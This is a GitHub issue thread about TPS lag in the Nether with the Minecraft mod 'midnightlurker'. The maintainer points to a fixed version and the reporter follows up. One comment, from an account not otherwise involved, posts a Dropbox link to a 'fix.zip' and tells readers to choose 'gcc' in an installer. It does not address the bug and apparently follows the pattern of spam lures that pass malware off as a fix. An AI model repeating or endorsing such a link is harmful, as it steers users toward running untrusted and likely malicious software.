### ISSUE TITLE
TPS issue in the Nether

### ISSUE THREAD

**Issue by Oloplo** [Voxla/midnightlurker#25]
The mod works great in the overworld and in the end, but as soon as I enter the nether, the TPS drop to the point where the game becomes unplayable. I've tried disabling Lurker spawns in the nether, but nothing changed.

Great mod btw, I hope you get this fixed soon!

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Voxla** [comment]
The TPS dropping should be fixed now in the newest update (3.3.0 and up); however, if the TPS is still really bad, let me know.

**Comment by Oloplo** [comment]
It's a lot better now, but I'd say there's still room for improvement. It's playable, but it still drops sometimes. Enough to get the "Server can't keep up" message. And now it does it in the overworld too for some reason.
